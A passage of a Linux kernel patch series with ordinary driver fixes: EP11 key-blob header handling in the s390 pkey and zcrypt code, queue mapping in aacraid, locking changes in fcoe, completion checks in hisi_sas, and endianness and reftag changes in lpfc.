+ 		card = apqns[i].card;
+ 		dom = apqns[i].domain;
+-		if (ktype == PKEY_TYPE_EP11) {
++		if (ktype == PKEY_TYPE_EP11 ||
++		    ktype == PKEY_TYPE_EP11_AES) {
+ 			rc = ep11_genaeskey(card, dom, ksize, kflags,
+-					    keybuf, keybufsize);
++					    keybuf, keybufsize, ktype);
+ 		} else if (ktype == PKEY_TYPE_CCA_DATA) {
+ 			rc = cca_genseckey(card, dom, ksize, keybuf);
+ 			*keybufsize = (rc ? 0 : SECKEYBLOBSIZE);
+@@ -747,7 +753,7 @@ static int pkey_verifykey2(const u8 *key, size_t keylen,
+ 		if (ktype)
+ 			*ktype = PKEY_TYPE_EP11;
+ 		if (ksize)
+-			*ksize = kb->head.keybitlen;
++			*ksize = kb->head.bitlen;
+ 
+ 		rc = ep11_findcard2(&_apqns, &_nr_apqns, *cardnr, *domain,
+ 				    ZCRYPT_CEX7, EP11_API_V, kb->wkvp);
+@@ -1313,7 +1319,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 		apqns = _copy_apqns_from_user(kgs.apqns, kgs.apqn_entries);
+ 		if (IS_ERR(apqns))
+ 			return PTR_ERR(apqns);
+-		kkey = kmalloc(klen, GFP_KERNEL);
++		kkey = kzalloc(klen, GFP_KERNEL);
+ 		if (!kkey) {
+ 			kfree(apqns);
+ 			return -ENOMEM;
+@@ -1941,7 +1947,7 @@ static struct attribute_group ccacipher_attr_group = {
+  * (i.e. off != 0 or count < key blob size) -EINVAL is returned.
+  * This function and the sysfs attributes using it provide EP11 key blobs
+  * padded to the upper limit of MAXEP11AESKEYBLOBSIZE which is currently
+- * 320 bytes.
++ * 336 bytes.
+  */
+ static ssize_t pkey_ep11_aes_attr_read(enum pkey_key_size keybits,
+ 				       bool is_xts, char *buf, loff_t off,
+@@ -1969,7 +1975,8 @@ static ssize_t pkey_ep11_aes_attr_read(enum pkey_key_size keybits,
+ 	for (i = 0, rc = -ENODEV; i < nr_apqns; i++) {
+ 		card = apqns[i] >> 16;
+ 		dom = apqns[i] & 0xFFFF;
+-		rc = ep11_genaeskey(card, dom, keybits, 0, buf, &keysize);
++		rc = ep11_genaeskey(card, dom, keybits, 0, buf, &keysize,
++				    PKEY_TYPE_EP11_AES);
+ 		if (rc == 0)
+ 			break;
+ 	}
+@@ -1979,7 +1986,8 @@ static ssize_t pkey_ep11_aes_attr_read(enum pkey_key_size keybits,
+ 	if (is_xts) {
+ 		keysize = MAXEP11AESKEYBLOBSIZE;
+ 		buf += MAXEP11AESKEYBLOBSIZE;
+-		rc = ep11_genaeskey(card, dom, keybits, 0, buf, &keysize);
++		rc = ep11_genaeskey(card, dom, keybits, 0, buf, &keysize,
++				    PKEY_TYPE_EP11_AES);
+ 		if (rc == 0)
+ 			return 2 * MAXEP11AESKEYBLOBSIZE;
+ 	}
+diff --git a/drivers/s390/crypto/zcrypt_ep11misc.c b/drivers/s390/crypto/zcrypt_ep11misc.c
+index b1c29017be5bc..20bbeec1a1a22 100644
+--- a/drivers/s390/crypto/zcrypt_ep11misc.c
++++ b/drivers/s390/crypto/zcrypt_ep11misc.c
+@@ -113,6 +113,50 @@ static void __exit card_cache_free(void)
+ 	spin_unlock_bh(&card_list_lock);
+ }
+ 
++static int ep11_kb_split(const u8 *kb, size_t kblen, u32 kbver,
++			 struct ep11kblob_header **kbhdr, size_t *kbhdrsize,
++			 u8 **kbpl, size_t *kbplsize)
++{
++	struct ep11kblob_header *hdr = NULL;
++	size_t hdrsize, plsize = 0;
++	int rc = -EINVAL;
++	u8 *pl = NULL;
++
++	if (kblen < sizeof(struct ep11kblob_header))
++		goto out;
++	hdr = (struct ep11kblob_header *)kb;
++
++	switch (kbver) {
++	case TOKVER_EP11_AES:
++		/* header overlays the payload */
++		hdrsize = 0;
++		break;
++	case TOKVER_EP11_ECC_WITH_HEADER:
++	case TOKVER_EP11_AES_WITH_HEADER:
++		/* payload starts after the header */
++		hdrsize = sizeof(struct ep11kblob_header);
++		break;
++	default:
++		goto out;
++	}
++
++	plsize = kblen - hdrsize;
++	pl = (u8 *)kb + hdrsize;
++
++	if (kbhdr)
++		*kbhdr = hdr;
++	if (kbhdrsize)
++		*kbhdrsize = hdrsize;
++	if (kbpl)
++		*kbpl = pl;
++	if (kbplsize)
++		*kbplsize = plsize;
++
++	rc = 0;
++out:
++	return rc;
++}
++
+ /*
+  * Simple check if the key blob is a valid EP11 AES key blob with header.
+  */
+@@ -664,8 +708,9 @@ EXPORT_SYMBOL(ep11_get_domain_info);
+  */
+ #define KEY_ATTR_DEFAULTS 0x00200c00
+ 
+-int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+-		   u8 *keybuf, size_t *keybufsize)
++static int _ep11_genaeskey(u16 card, u16 domain,
++			   u32 keybitsize, u32 keygenflags,
++			   u8 *keybuf, size_t *keybufsize)
+ {
+ 	struct keygen_req_pl {
+ 		struct pl_head head;
+@@ -701,7 +746,6 @@ int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+ 	struct ep11_cprb *req = NULL, *rep = NULL;
+ 	struct ep11_target_dev target;
+ 	struct ep11_urb *urb = NULL;
+-	struct ep11keyblob *kb;
+ 	int api, rc = -ENOMEM;
+ 
+ 	switch (keybitsize) {
+@@ -780,14 +824,9 @@ int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+ 		goto out;
+ 	}
+ 
+-	/* copy key blob and set header values */
++	/* copy key blob */
+ 	memcpy(keybuf, rep_pl->data, rep_pl->data_len);
+ 	*keybufsize = rep_pl->data_len;
+-	kb = (struct ep11keyblob *)keybuf;
+-	kb->head.type = TOKTYPE_NON_CCA;
+-	kb->head.len = rep_pl->data_len;
+-	kb->head.version = TOKVER_EP11_AES;
+-	kb->head.keybitlen = keybitsize;
+ 
+ out:
+ 	kfree(req);
+@@ -795,6 +834,43 @@ out:
+ 	kfree(urb);
+ 	return rc;
+ }
++
++int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
++		   u8 *keybuf, size_t *keybufsize, u32 keybufver)
++{
++	struct ep11kblob_header *hdr;
++	size_t hdr_size, pl_size;
++	u8 *pl;
++	int rc;
++
++	switch (keybufver) {
++	case TOKVER_EP11_AES:
++	case TOKVER_EP11_AES_WITH_HEADER:
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	rc = ep11_kb_split(keybuf, *keybufsize, keybufver,
++			   &hdr, &hdr_size, &pl, &pl_size);
++	if (rc)
++		return rc;
++
++	rc = _ep11_genaeskey(card, domain, keybitsize, keygenflags,
++			     pl, &pl_size);
++	if (rc)
++		return rc;
++
++	*keybufsize = hdr_size + pl_size;
++
++	/* update header information */
++	hdr->type = TOKTYPE_NON_CCA;
++	hdr->len = *keybufsize;
++	hdr->version = keybufver;
++	hdr->bitlen = keybitsize;
++
++	return 0;
++}
+ EXPORT_SYMBOL(ep11_genaeskey);
+ 
+ static int ep11_cryptsingle(u16 card, u16 domain,
+@@ -1055,7 +1131,7 @@ static int ep11_unwrapkey(u16 card, u16 domain,
+ 	kb->head.type = TOKTYPE_NON_CCA;
+ 	kb->head.len = rep_pl->data_len;
+ 	kb->head.version = TOKVER_EP11_AES;
+-	kb->head.keybitlen = keybitsize;
++	kb->head.bitlen = keybitsize;
+ 
+ out:
+ 	kfree(req);
+@@ -1201,7 +1277,6 @@ int ep11_clr2keyblob(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+ 		     const u8 *clrkey, u8 *keybuf, size_t *keybufsize)
+ {
+ 	int rc;
+-	struct ep11keyblob *kb;
+ 	u8 encbuf[64], *kek = NULL;
+ 	size_t clrkeylen, keklen, encbuflen = sizeof(encbuf);
+ 
+@@ -1223,17 +1298,15 @@ int ep11_clr2keyblob(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+ 	}
+ 
+ 	/* Step 1: generate AES 256 bit random kek key */
+-	rc = ep11_genaeskey(card, domain, 256,
+-			    0x00006c00, /* EN/DECRYPT, WRAP/UNWRAP */
+-			    kek, &keklen);
++	rc = _ep11_genaeskey(card, domain, 256,
++			     0x00006c00, /* EN/DECRYPT, WRAP/UNWRAP */
++			     kek, &keklen);
+ 	if (rc) {
+ 		DEBUG_ERR(
+ 			"%s generate kek key failed, rc=%d\n",
+ 			__func__, rc);
+ 		goto out;
+ 	}
+-	kb = (struct ep11keyblob *)kek;
+-	memset(&kb->head, 0, sizeof(kb->head));
+ 
+ 	/* Step 2: encrypt clear key value with the kek key */
+ 	rc = ep11_cryptsingle(card, domain, 0, 0, def_iv, kek, keklen,
+diff --git a/drivers/s390/crypto/zcrypt_ep11misc.h b/drivers/s390/crypto/zcrypt_ep11misc.h
+index 07445041869fe..ed328c354bade 100644
+--- a/drivers/s390/crypto/zcrypt_ep11misc.h
++++ b/drivers/s390/crypto/zcrypt_ep11misc.h
+@@ -29,14 +29,7 @@ struct ep11keyblob {
+ 	union {
+ 		u8 session[32];
+ 		/* only used for PKEY_TYPE_EP11: */
+-		struct {
+-			u8  type;      /* 0x00 (TOKTYPE_NON_CCA) */
+-			u8  res0;      /* unused */
+-			u16 len;       /* total length in bytes of this blob */
+-			u8  version;   /* 0x03 (TOKVER_EP11_AES) */
+-			u8  res1;      /* unused */
+-			u16 keybitlen; /* clear key bit len, 0 for unknown */
+-		} head;
++		struct ep11kblob_header head;
+ 	};
+ 	u8  wkvp[16];  /* wrapping key verification pattern */
+ 	u64 attr;      /* boolean key attributes */
+@@ -114,7 +107,7 @@ int ep11_get_domain_info(u16 card, u16 domain, struct ep11_domain_info *info);
+  * Generate (random) EP11 AES secure key.
+  */
+ int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+-		   u8 *keybuf, size_t *keybufsize);
++		   u8 *keybuf, size_t *keybufsize, u32 keybufver);
+ 
+ /*
+  * Generate EP11 AES secure key with given clear key value.
+diff --git a/drivers/scsi/aacraid/aacraid.h b/drivers/scsi/aacraid/aacraid.h
+index 5e115e8b2ba46..7c6efde75da66 100644
+--- a/drivers/scsi/aacraid/aacraid.h
++++ b/drivers/scsi/aacraid/aacraid.h
+@@ -1678,6 +1678,7 @@ struct aac_dev
+ 	u32			handle_pci_error;
+ 	bool			init_reset;
+ 	u8			soft_reset_support;
++	u8			use_map_queue;
+ };
+ 
+ #define aac_adapter_interrupt(dev) \
+diff --git a/drivers/scsi/aacraid/commsup.c b/drivers/scsi/aacraid/commsup.c
+index deb32c9f4b3e6..3f062e4013ab6 100644
+--- a/drivers/scsi/aacraid/commsup.c
++++ b/drivers/scsi/aacraid/commsup.c
+@@ -223,8 +223,12 @@ int aac_fib_setup(struct aac_dev * dev)
+ struct fib *aac_fib_alloc_tag(struct aac_dev *dev, struct scsi_cmnd *scmd)
+ {
+ 	struct fib *fibptr;
++	u32 blk_tag;
++	int i;
+ 
+-	fibptr = &dev->fibs[scsi_cmd_to_rq(scmd)->tag];
++	blk_tag = blk_mq_unique_tag(scsi_cmd_to_rq(scmd));
++	i = blk_mq_unique_tag_to_tag(blk_tag);
++	fibptr = &dev->fibs[i];
+ 	/*
+ 	 *	Null out fields that depend on being zero at the start of
+ 	 *	each I/O
+diff --git a/drivers/scsi/aacraid/linit.c b/drivers/scsi/aacraid/linit.c
+index 5ba5c18b77b46..bff49b8ab057d 100644
+--- a/drivers/scsi/aacraid/linit.c
++++ b/drivers/scsi/aacraid/linit.c
+@@ -19,6 +19,7 @@
+ 
+ #include <linux/compat.h>
+ #include <linux/blkdev.h>
++#include <linux/blk-mq-pci.h>
+ #include <linux/completion.h>
+ #include <linux/init.h>
+ #include <linux/interrupt.h>
+@@ -505,6 +506,15 @@ common_config:
+ 	return 0;
+ }
+ 
++static void aac_map_queues(struct Scsi_Host *shost)
++{
++	struct aac_dev *aac = (struct aac_dev *)shost->hostdata;
++
++	blk_mq_pci_map_queues(&shost->tag_set.map[HCTX_TYPE_DEFAULT],
++			      aac->pdev, 0);
++	aac->use_map_queue = true;
++}
++
+ /**
+  *	aac_change_queue_depth		-	alter queue depths
+  *	@sdev:	SCSI device we are considering
+@@ -1489,6 +1499,7 @@ static struct scsi_host_template aac_driver_template = {
+ 	.bios_param			= aac_biosparm,
+ 	.shost_groups			= aac_host_groups,
+ 	.slave_configure		= aac_slave_configure,
++	.map_queues			= aac_map_queues,
+ 	.change_queue_depth		= aac_change_queue_depth,
+ 	.sdev_groups			= aac_dev_groups,
+ 	.eh_abort_handler		= aac_eh_abort,
+@@ -1776,6 +1787,8 @@ static int aac_probe_one(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	shost->max_lun = AAC_MAX_LUN;
+ 
+ 	pci_set_drvdata(pdev, shost);
++	shost->nr_hw_queues = aac->max_msix;
++	shost->host_tagset = 1;
+ 
+ 	error = scsi_add_host(shost, &pdev->dev);
+ 	if (error)
+@@ -1908,6 +1921,7 @@ static void aac_remove_one(struct pci_dev *pdev)
+ 	struct aac_dev *aac = (struct aac_dev *)shost->hostdata;
+ 
+ 	aac_cancel_rescan_worker(aac);
++	aac->use_map_queue = false;
+ 	scsi_remove_host(shost);
+ 
+ 	__aac_shutdown(aac);
+diff --git a/drivers/scsi/aacraid/src.c b/drivers/scsi/aacraid/src.c
+index 11ef58204e96f..61949f3741886 100644
+--- a/drivers/scsi/aacraid/src.c
++++ b/drivers/scsi/aacraid/src.c
+@@ -493,6 +493,10 @@ static int aac_src_deliver_message(struct fib *fib)
+ #endif
+ 
+ 	u16 vector_no;
++	struct scsi_cmnd *scmd;
++	u32 blk_tag;
++	struct Scsi_Host *shost = dev->scsi_host_ptr;
++	struct blk_mq_queue_map *qmap;
+ 
+ 	atomic_inc(&q->numpending);
+ 
+@@ -505,8 +509,25 @@ static int aac_src_deliver_message(struct fib *fib)
+ 		if ((dev->comm_interface == AAC_COMM_MESSAGE_TYPE3)
+ 			&& dev->sa_firmware)
+ 			vector_no = aac_get_vector(dev);
+-		else
+-			vector_no = fib->vector_no;
++		else {
++			if (!fib->vector_no || !fib->callback_data) {
++				if (shost && dev->use_map_queue) {
++					qmap = &shost->tag_set.map[HCTX_TYPE_DEFAULT];
++					vector_no = qmap->mq_map[raw_smp_processor_id()];
++				}
++				/*
++				 *	We hardcode the vector_no for
++				 *	reserved commands as a valid shost is
++				 *	absent during the init
++				 */
++				else
++					vector_no = 0;
++			} else {
++				scmd = (struct scsi_cmnd *)fib->callback_data;
++				blk_tag = blk_mq_unique_tag(scsi_cmd_to_rq(scmd));
++				vector_no = blk_mq_unique_tag_to_hwq(blk_tag);
++			}
++		}
+ 
+ 		if (native_hba) {
+ 			if (fib->flags & FIB_CONTEXT_FLAG_NATIVE_HBA_TMF) {
+diff --git a/drivers/scsi/be2iscsi/be_iscsi.c b/drivers/scsi/be2iscsi/be_iscsi.c
+index 8aeaddc93b167..8d374ae863ba2 100644
+--- a/drivers/scsi/be2iscsi/be_iscsi.c
++++ b/drivers/scsi/be2iscsi/be_iscsi.c
+@@ -450,6 +450,10 @@ int beiscsi_iface_set_param(struct Scsi_Host *shost,
+ 	}
+ 
+ 	nla_for_each_attr(attrib, data, dt_len, rm_len) {
++		/* ignore nla_type as it is never used */
++		if (nla_len(attrib) < sizeof(*iface_param))
++			return -EINVAL;
++
+ 		iface_param = nla_data(attrib);
+ 
+ 		if (iface_param->param_type != ISCSI_NET_PARAM)
+diff --git a/drivers/scsi/fcoe/fcoe_ctlr.c b/drivers/scsi/fcoe/fcoe_ctlr.c
+index ddc048069af25..8a4124e7d2043 100644
+--- a/drivers/scsi/fcoe/fcoe_ctlr.c
++++ b/drivers/scsi/fcoe/fcoe_ctlr.c
+@@ -319,16 +319,17 @@ static void fcoe_ctlr_announce(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *sel;
+ 	struct fcoe_fcf *fcf;
++	unsigned long flags;
+ 
+ 	mutex_lock(&fip->ctlr_mutex);
+-	spin_lock_bh(&fip->ctlr_lock);
++	spin_lock_irqsave(&fip->ctlr_lock, flags);
+ 
+ 	kfree_skb(fip->flogi_req);
+ 	fip->flogi_req = NULL;
+ 	list_for_each_entry(fcf, &fip->fcfs, list)
+ 		fcf->flogi_sent = 0;
+ 
+-	spin_unlock_bh(&fip->ctlr_lock);
++	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
+ 	sel = fip->sel_fcf;
+ 
+ 	if (sel && ether_addr_equal(sel->fcf_mac, fip->dest_addr))
+@@ -699,6 +700,7 @@ int fcoe_ctlr_els_send(struct fcoe_ctlr *fip, struct fc_lport *lport,
+ {
+ 	struct fc_frame *fp;
+ 	struct fc_frame_header *fh;
++	unsigned long flags;
+ 	u16 old_xid;
+ 	u8 op;
+ 	u8 mac[ETH_ALEN];
+@@ -732,11 +734,11 @@ int fcoe_ctlr_els_send(struct fcoe_ctlr *fip, struct fc_lport *lport,
+ 		op = FIP_DT_FLOGI;
+ 		if (fip->mode == FIP_MODE_VN2VN)
+ 			break;
+-		spin_lock_bh(&fip->ctlr_lock);
++		spin_lock_irqsave(&fip->ctlr_lock, flags);
+ 		kfree_skb(fip->flogi_req);
+ 		fip->flogi_req = skb;
+ 		fip->flogi_req_send = 1;
+-		spin_unlock_bh(&fip->ctlr_lock);
++		spin_unlock_irqrestore(&fip->ctlr_lock, flags);
+ 		schedule_work(&fip->timer_work);
+ 		return -EINPROGRESS;
+ 	case ELS_FDISC:
+@@ -1705,10 +1707,11 @@ static int fcoe_ctlr_flogi_send_locked(struct fcoe_ctlr *fip)
+ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *fcf;
++	unsigned long flags;
+ 	int error;
+ 
+ 	mutex_lock(&fip->ctlr_mutex);
+-	spin_lock_bh(&fip->ctlr_lock);
++	spin_lock_irqsave(&fip->ctlr_lock, flags);
+ 	LIBFCOE_FIP_DBG(fip, "re-sending FLOGI - reselect\n");
+ 	fcf = fcoe_ctlr_select(fip);
+ 	if (!fcf || fcf->flogi_sent) {
+@@ -1719,7 +1722,7 @@ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ 		fcoe_ctlr_solicit(fip, NULL);
+ 		error = fcoe_ctlr_flogi_send_locked(fip);
+ 	}
+-	spin_unlock_bh(&fip->ctlr_lock);
++	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
+ 	mutex_unlock(&fip->ctlr_mutex);
+ 	return error;
+ }
+@@ -1736,8 +1739,9 @@ static int fcoe_ctlr_flogi_retry(struct fcoe_ctlr *fip)
+ static void fcoe_ctlr_flogi_send(struct fcoe_ctlr *fip)
+ {
+ 	struct fcoe_fcf *fcf;
++	unsigned long flags;
+ 
+-	spin_lock_bh(&fip->ctlr_lock);
++	spin_lock_irqsave(&fip->ctlr_lock, flags);
+ 	fcf = fip->sel_fcf;
+ 	if (!fcf || !fip->flogi_req_send)
+ 		goto unlock;
+@@ -1764,7 +1768,7 @@ static void fcoe_ctlr_flogi_send(struct fcoe_ctlr *fip)
+ 	} else /* XXX */
+ 		LIBFCOE_FIP_DBG(fip, "No FCF selected - defer send\n");
+ unlock:
+-	spin_unlock_bh(&fip->ctlr_lock);
++	spin_unlock_irqrestore(&fip->ctlr_lock, flags);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+index 02575d81afca2..50697672146ad 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+@@ -2026,6 +2026,11 @@ static void slot_err_v2_hw(struct hisi_hba *hisi_hba,
+ 	u16 dma_tx_err_type = le16_to_cpu(err_record->dma_tx_err_type);
+ 	u16 sipc_rx_err_type = le16_to_cpu(err_record->sipc_rx_err_type);
+ 	u32 dma_rx_err_type = le32_to_cpu(err_record->dma_rx_err_type);
++	struct hisi_sas_complete_v2_hdr *complete_queue =
++			hisi_hba->complete_hdr[slot->cmplt_queue];
++	struct hisi_sas_complete_v2_hdr *complete_hdr =
++			&complete_queue[slot->cmplt_queue_slot];
++	u32 dw0 = le32_to_cpu(complete_hdr->dw0);
+ 	int error = -1;
+ 
+ 	if (err_phase == 1) {
+@@ -2310,7 +2315,8 @@ static void slot_err_v2_hw(struct hisi_hba *hisi_hba,
+ 			break;
+ 		}
+ 		}
+-		hisi_sas_sata_done(task, slot);
++		if (dw0 & CMPLT_HDR_RSPNS_XFRD_MSK)
++			hisi_sas_sata_done(task, slot);
+ 	}
+ 		break;
+ 	default:
+@@ -2443,7 +2449,8 @@ static void slot_complete_v2_hw(struct hisi_hba *hisi_hba,
+ 	case SAS_PROTOCOL_SATA | SAS_PROTOCOL_STP:
+ 	{
+ 		ts->stat = SAS_SAM_STAT_GOOD;
+-		hisi_sas_sata_done(task, slot);
++		if (dw0 & CMPLT_HDR_RSPNS_XFRD_MSK)
++			hisi_sas_sata_done(task, slot);
+ 		break;
+ 	}
+ 	default:
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index e8a3511040af2..c0e74d768716d 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -2163,6 +2163,7 @@ slot_err_v3_hw(struct hisi_hba *hisi_hba, struct sas_task *task,
+ 	u32 trans_tx_fail_type = le32_to_cpu(record->trans_tx_fail_type);
+ 	u16 sipc_rx_err_type = le16_to_cpu(record->sipc_rx_err_type);
+ 	u32 dw3 = le32_to_cpu(complete_hdr->dw3);
++	u32 dw0 = le32_to_cpu(complete_hdr->dw0);
+ 
+ 	switch (task->task_proto) {
+ 	case SAS_PROTOCOL_SSP:
+@@ -2172,8 +2173,8 @@ slot_err_v3_hw(struct hisi_hba *hisi_hba, struct sas_task *task,
+ 			 * but I/O information has been written to the host memory, we examine
+ 			 * response IU.
+ 			 */
+-			if (!(complete_hdr->dw0 & CMPLT_HDR_RSPNS_GOOD_MSK) &&
+-				(complete_hdr->dw0 & CMPLT_HDR_RSPNS_XFRD_MSK))
++			if (!(dw0 & CMPLT_HDR_RSPNS_GOOD_MSK) &&
++			    (dw0 & CMPLT_HDR_RSPNS_XFRD_MSK))
+ 				return false;
+ 
+ 			ts->residual = trans_tx_fail_type;
+@@ -2189,7 +2190,7 @@ slot_err_v3_hw(struct hisi_hba *hisi_hba, struct sas_task *task,
+ 	case SAS_PROTOCOL_SATA:
+ 	case SAS_PROTOCOL_STP:
+ 	case SAS_PROTOCOL_SATA | SAS_PROTOCOL_STP:
+-		if ((complete_hdr->dw0 & CMPLT_HDR_RSPNS_XFRD_MSK) &&
++		if ((dw0 & CMPLT_HDR_RSPNS_XFRD_MSK) &&
+ 		    (sipc_rx_err_type & RX_FIS_STATUS_ERR_MSK)) {
+ 			ts->stat = SAS_PROTO_RESPONSE;
+ 		} else if (dma_rx_err_type & RX_DATA_LEN_UNDERFLOW_MSK) {
+@@ -2202,7 +2203,8 @@ slot_err_v3_hw(struct hisi_hba *hisi_hba, struct sas_task *task,
+ 			ts->stat = SAS_OPEN_REJECT;
+ 			ts->open_rej_reason = SAS_OREJ_RSVD_RETRY;
+ 		}
+-		hisi_sas_sata_done(task, slot);
++		if (dw0 & CMPLT_HDR_RSPNS_XFRD_MSK)
++			hisi_sas_sata_done(task, slot);
+ 		break;
+ 	case SAS_PROTOCOL_SMP:
+ 		ts->stat = SAS_SAM_STAT_CHECK_CONDITION;
+@@ -2329,7 +2331,8 @@ static void slot_complete_v3_hw(struct hisi_hba *hisi_hba,
+ 	case SAS_PROTOCOL_STP:
+ 	case SAS_PROTOCOL_SATA | SAS_PROTOCOL_STP:
+ 		ts->stat = SAS_SAM_STAT_GOOD;
+-		hisi_sas_sata_done(task, slot);
++		if (dw0 & CMPLT_HDR_RSPNS_XFRD_MSK)
++			hisi_sas_sata_done(task, slot);
+ 		break;
+ 	default:
+ 		ts->stat = SAS_SAM_STAT_CHECK_CONDITION;
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 45a2fd6584d16..8b825364baade 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -535,7 +535,7 @@ EXPORT_SYMBOL(scsi_host_alloc);
+ static int __scsi_host_match(struct device *dev, const void *data)
+ {
+ 	struct Scsi_Host *p;
+-	const unsigned short *hostnum = data;
++	const unsigned int *hostnum = data;
+ 
+ 	p = class_to_shost(dev);
+ 	return p->host_no == *hostnum;
+@@ -552,7 +552,7 @@ static int __scsi_host_match(struct device *dev, const void *data)
+  *	that scsi_host_get() took. The put_device() below dropped
+  *	the reference from class_find_device().
+  **/
+-struct Scsi_Host *scsi_host_lookup(unsigned short hostnum)
++struct Scsi_Host *scsi_host_lookup(unsigned int hostnum)
+ {
+ 	struct device *cdev;
+ 	struct Scsi_Host *shost = NULL;
+diff --git a/drivers/scsi/lpfc/lpfc_bsg.c b/drivers/scsi/lpfc/lpfc_bsg.c
+index 852b025e2fecf..b54fafb486e06 100644
+--- a/drivers/scsi/lpfc/lpfc_bsg.c
++++ b/drivers/scsi/lpfc/lpfc_bsg.c
+@@ -889,7 +889,7 @@ lpfc_bsg_ct_unsol_event(struct lpfc_hba *phba, struct lpfc_sli_ring *pring,
+ 			struct lpfc_iocbq *piocbq)
+ {
+ 	uint32_t evt_req_id = 0;
+-	uint32_t cmd;
++	u16 cmd;
+ 	struct lpfc_dmabuf *dmabuf = NULL;
+ 	struct lpfc_bsg_event *evt;
+ 	struct event_data *evt_dat = NULL;
+@@ -915,7 +915,7 @@ lpfc_bsg_ct_unsol_event(struct lpfc_hba *phba, struct lpfc_sli_ring *pring,
+ 
+ 	ct_req = (struct lpfc_sli_ct_request *)bdeBuf1->virt;
+ 	evt_req_id = ct_req->FsType;
+-	cmd = ct_req->CommandResponse.bits.CmdRsp;
++	cmd = be16_to_cpu(ct_req->CommandResponse.bits.CmdRsp);
+ 
+ 	spin_lock_irqsave(&phba->ct_ev_lock, flags);
+ 	list_for_each_entry(evt, &phba->ct_ev_waiters, node) {
+@@ -3186,8 +3186,8 @@ lpfc_bsg_diag_loopback_run(struct bsg_job *job)
+ 			ctreq->RevisionId.bits.InId = 0;
+ 			ctreq->FsType = SLI_CT_ELX_LOOPBACK;
+ 			ctreq->FsSubType = 0;
+-			ctreq->CommandResponse.bits.CmdRsp = ELX_LOOPBACK_DATA;
+-			ctreq->CommandResponse.bits.Size   = size;
++			ctreq->CommandResponse.bits.CmdRsp = cpu_to_be16(ELX_LOOPBACK_DATA);
++			ctreq->CommandResponse.bits.Size   = cpu_to_be16(size);
+ 			segment_offset = ELX_LOOPBACK_HEADER_SZ;
+ 		} else
+ 			segment_offset = 0;
+diff --git a/drivers/scsi/lpfc/lpfc_scsi.c b/drivers/scsi/lpfc/lpfc_scsi.c
+index 7a1563564df7f..7aac9fc719675 100644
+--- a/drivers/scsi/lpfc/lpfc_scsi.c
++++ b/drivers/scsi/lpfc/lpfc_scsi.c
+@@ -109,8 +109,6 @@ lpfc_sli4_set_rsp_sgl_last(struct lpfc_hba *phba,
+ 	}
+ }
+ 
+-#define LPFC_INVALID_REFTAG ((u32)-1)
+-
+ /**
+  * lpfc_rampdown_queue_depth - Post RAMP_DOWN_QUEUE event to worker thread
+  * @phba: The Hba for which this call is being executed.
+@@ -978,8 +976,6 @@ lpfc_bg_err_inject(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 
+ 	sgpe = scsi_prot_sglist(sc);
+ 	lba = scsi_prot_ref_tag(sc);
+-	if (lba == LPFC_INVALID_REFTAG)
+-		return 0;
+ 
+ 	/* First check if we need to match the LBA */
+ 	if (phba->lpfc_injerr_lba != LPFC_INJERR_LBA_OFF) {
+@@ -1560,8 +1556,6 @@ lpfc_bg_setup_bpl(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 
+ 	/* extract some info from the scsi command for pde*/
+ 	reftag = scsi_prot_ref_tag(sc);
+-	if (reftag == LPFC_INVALID_REFTAG)
+-		goto out;
+ 
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+ 	rc = lpfc_bg_err_inject(phba, sc, &reftag, NULL, 1);
+@@ -1723,8 +1717,6 @@ lpfc_bg_setup_bpl_prot(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 	/* extract some info from the scsi command */
+ 	blksize = scsi_prot_interval(sc);
+ 	reftag = scsi_prot_ref_tag(sc);
+-	if (reftag == LPFC_INVALID_REFTAG)
+-		goto out;
+ 
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+ 	rc = lpfc_bg_err_inject(phba, sc, &reftag, NULL, 1);
+@@ -1954,8 +1946,6 @@ lpfc_bg_setup_sgl(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 
+ 	/* extract some info from the scsi command for pde*/
+ 	reftag = scsi_prot_ref_tag(sc);
+-	if (reftag == LPFC_INVALID_REFTAG)
+-		goto out;
+ 
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+ 	rc = lpfc_bg_err_inject(phba, sc, &reftag, NULL, 1);
+@@ -2155,8 +2145,6 @@ lpfc_bg_setup_sgl_prot(struct lpfc_hba *phba, struct scsi_cmnd *sc,
+ 	/* extract some info from the scsi command */
+ 	blksize = scsi_prot_interval(sc);
+ 	reftag = scsi_prot_ref_tag(sc);
+-	if (reftag == LPFC_INVALID_REFTAG)
+-		goto out;
+ 
+ #ifdef CONFIG_SCSI_LPFC_DEBUG_FS
+ 	rc = lpfc_bg_err_inject(phba, sc, &reftag, NULL, 1);
